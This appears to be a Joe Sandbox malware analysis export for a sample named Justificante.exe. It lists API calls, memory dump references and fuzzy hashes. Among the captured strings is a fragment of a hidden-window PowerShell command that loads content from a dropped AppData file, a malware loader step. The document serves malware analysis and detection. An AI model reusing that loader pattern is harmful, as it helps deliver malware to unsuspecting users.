                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                          • Instruction ID: a37d777e965e9699b0e23720f5de0982c89539c866ab1c77fb99c91eca42481e
                          • Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                          • Instruction Fuzzy Hash: B2E0E672010109BFEF195F50ED0ADBB371DE704340F11452EFD07D4051E6B5A930A674
                          APIs
                          • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040F4A6,0040CEF0,00403511,0040CEF0,0040F4A6,00414EF0,00004000,?,00000000,0040333B,00000004), ref: 004060F8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: FileWrite
                          • String ID:
                          • API String ID: 3934441357-0
                          • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                          • Instruction ID: 6979515bda9704ff85578e0c0429e47610ce6c1510064802d49ef9c1332cb9e6
                          • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                          • Instruction Fuzzy Hash: E3E08C3221022AABEF109E618C04AEB7B6CEB01360F014832FE16E7040D271E9308BE8
                          APIs
                          • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040358D,0040A230,0040A230,00403491,00414EF0,00004000,?,00000000,0040333B), ref: 004060C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                          • Instruction ID: 6a9dac85b633d085c252a5e98b17eff4fa9db91ceb9277f9f5c2807d74357857
                          • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                          • Instruction Fuzzy Hash: DCE0E63215026AABDF109E559C04AEB775CEF05751F014836F916E6190D631E93197A4
                          APIs
                          • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040241D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: PrivateProfileString
                          • String ID:
                          • API String ID: 1096422788-0
                          • Opcode ID: f55628d4b7fc1c3702899dee1337003f381c7036a296fbc4314416ebe8ce5134
                          • Instruction ID: 84a3be15b77accaad8f92e5f77cb7225a0a8ac318d6267ea73d07213f2db240d
                          • Opcode Fuzzy Hash: f55628d4b7fc1c3702899dee1337003f381c7036a296fbc4314416ebe8ce5134
                          • Instruction Fuzzy Hash: D3E04F30800219AADB00AFA0CE09EAE3769BF00300F10093AF520BB0D1E7FC89409749
                          APIs
                          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406437,?,00000000,?,?,trikinse,?), ref: 004063CD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                          • Instruction ID: b93d09ea675ceb766083aeed6388771540e4ed4a45e177d9f546af7c41f1e6d1
                          • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                          • Instruction Fuzzy Hash: 2CD0123200020EBBDF115F91FD01FAB3B1DAB08710F014426FE06E4091D775D930A765
                          APIs
                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 848f5413c643dcd6a6357db9814cd2431fe745a12ee5d130b970cf4cbeb94c69
                          • Instruction ID: 319356c04533e9289a6ed1861cb0ef80ae0b3bb3c13a9342652098b8c4421f6d
                          • Opcode Fuzzy Hash: 848f5413c643dcd6a6357db9814cd2431fe745a12ee5d130b970cf4cbeb94c69
                          • Instruction Fuzzy Hash: 60D01772B042049BCB00DFA9AA48A9E73B0EF24328B308537D521F21D0D6B889519A2A
                          APIs
                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                          • Instruction ID: 113db2c9408c8cca4cfcb58c80206ddc2c6448e789c7211f53b93fac71a9565f
                          • Opcode Fuzzy Hash: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                          • Instruction Fuzzy Hash: 1FC04C71740601BADA208B509E45F0777546750740F158469B741A50E0CA74E411D62D
                          APIs
                          • ShellExecuteExW.SHELL32(?), ref: 00405B77
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: ExecuteShell
                          • String ID:
                          • API String ID: 587946157-0
                          • Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                          • Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
                          • Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                          • Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29
                          APIs
                          • SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                          • Instruction ID: 26063d6d883ff380d2e1d7f9fe2b9d631bf033e6200e0a233fd0d302f8c02db7
                          • Opcode Fuzzy Hash: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                          • Instruction Fuzzy Hash: 5BB01235286A00FBDE614B00DE09F457E62F764B01F048078F741240F0CAB300B5DF19
                          APIs
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                          • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                          • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                          • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                          APIs
                          • KiUserCallbackDispatcher.NTDLL(?,0040428B), ref: 004044BE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: CallbackDispatcherUser
                          • String ID:
                          • API String ID: 2492992576-0
                          • Opcode ID: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                          • Instruction ID: 97f05af551d2e904d84950d91e3a9b28448307360fbef328a82585e9573e9e03
                          • Opcode Fuzzy Hash: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                          • Instruction Fuzzy Hash: DBA001B6604500ABDE129F61EF09D0ABB72EBA4B02B418579A28590034CA365961FB1D
                          APIs
                            • Part of subcall function 004055A4: lstrlenW.KERNEL32(lgmnd,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                            • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,lgmnd,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                            • Part of subcall function 004055A4: lstrcatW.KERNEL32(lgmnd,00403040,00403040,lgmnd,00000000,00000000,00000000), ref: 004055FF
                            • Part of subcall function 004055A4: SetWindowTextW.USER32(lgmnd,lgmnd), ref: 00405611
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                            • Part of subcall function 00405B25: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 00405B4E
                            • Part of subcall function 00405B25: CloseHandle.KERNEL32(?), ref: 00405B5B
                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                            • Part of subcall function 004069DC: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069ED
                            • Part of subcall function 004069DC: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A0F
                            • Part of subcall function 00406483: wsprintfW.USER32 ref: 00406490
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                          • String ID:
                          • API String ID: 2972824698-0
                          • Opcode ID: cc1e309ce94d4eccb02165792b46fc07c6741db60f9536757cdbcaee0559ca1d
                          • Instruction ID: 66341155deae8ad644fb6ace1de356795f4bfdbac14da0be535d1b9f500edd4f
                          • Opcode Fuzzy Hash: cc1e309ce94d4eccb02165792b46fc07c6741db60f9536757cdbcaee0559ca1d
                          • Instruction Fuzzy Hash: C0F09032905112EBCB20AFE5998499E73B4DF00318B21443BE912B61D1C7BC0E428A6E
                          APIs
                          • GetDlgItem.USER32(?,000003FB), ref: 004049D2
                          • SetWindowTextW.USER32(00000000,?), ref: 004049FC
                          • SHBrowseForFolderW.SHELL32(?), ref: 00404AAD
                          • CoTaskMemFree.OLE32(00000000), ref: 00404AB8
                          • lstrcmpiW.KERNEL32(trikinse,00423748,00000000,?,?), ref: 00404AEA
                          • lstrcatW.KERNEL32(?,trikinse), ref: 00404AF6
                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B08
                            • Part of subcall function 00405B86: GetDlgItemTextW.USER32(?,?,00000400,00404B3F), ref: 00405B99
                            • Part of subcall function 004067EB: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Justificante.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
                            • Part of subcall function 004067EB: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
                            • Part of subcall function 004067EB: CharNextW.USER32(?,00000000,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Justificante.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
                            • Part of subcall function 004067EB: CharPrevW.USER32(?,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Justificante.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875
                          • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404BCB
                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BE6
                            • Part of subcall function 00404D3F: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
                            • Part of subcall function 00404D3F: wsprintfW.USER32 ref: 00404DE9
                            • Part of subcall function 00404D3F: SetDlgItemTextW.USER32(?,00423748), ref: 00404DFC
                          Strings
                          • trikinse, xrefs: 00404AE4, 00404AE9, 00404AF4
                          • C:\Users\user\AppData\Local\unavailability\unmeliorated, xrefs: 00404AD3
                          • "powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Dare, xrefs: 0040499C
                          • A, xrefs: 00404AA6
                          • H7B, xrefs: 00404A80
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                          • String ID: "powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Dare$A$C:\Users\user\AppData\Local\unavailability\unmeliorated$H7B$trikinse
                          • API String ID: 2624150263-3290625343
                          • Opcode ID: 9b50889d4655b4d9f72ca50bc35f9129308dce0b2aea78f36d334f5aa2f4ae2a
                          • Instruction ID: 8299be71a3cc8d15b5ba292867d4bcc1bae11f059afa92557538f40593a335a7
                          • Opcode Fuzzy Hash: 9b50889d4655b4d9f72ca50bc35f9129308dce0b2aea78f36d334f5aa2f4ae2a
                          • Instruction Fuzzy Hash: 8EA193B1900209ABDB11AFA5DD45AAFB7B8EF84314F11803BF601B62D1D77C9941CB6D
                          APIs
                          • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
                          Strings
                          • C:\Users\user\AppData\Local\unavailability\unmeliorated\Organisationsmeddelelses\Konfronteringer, xrefs: 00402261
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: CreateInstance
                          • String ID: C:\Users\user\AppData\Local\unavailability\unmeliorated\Organisationsmeddelelses\Konfronteringer
                          • API String ID: 542301482-3767348336
                          • Opcode ID: 5af9135ba59482d15b8eba766ae0685eae6086f6b6ffaba7cd38e99d6e7f92d4
                          • Instruction ID: 3a0b8fa6945436ea0e4cb0e043321d643ed21fd69d70badd8d93d2b131f18866
                          • Opcode Fuzzy Hash: 5af9135ba59482d15b8eba766ae0685eae6086f6b6ffaba7cd38e99d6e7f92d4
                          • Instruction Fuzzy Hash: C9412775A00209AFCF00DFE4C989A9E7BB6FF48304B20457AF915EB2D1DB799981CB54
                          APIs
                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046EF
                          • GetDlgItem.USER32(?,000003E8), ref: 00404703
                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404720
                          • GetSysColor.USER32(?), ref: 00404731
                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040473F
                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040474D
                          • lstrlenW.KERNEL32(?), ref: 00404752
                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040475F
                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404774
                          • GetDlgItem.USER32(?,0000040A), ref: 004047CD
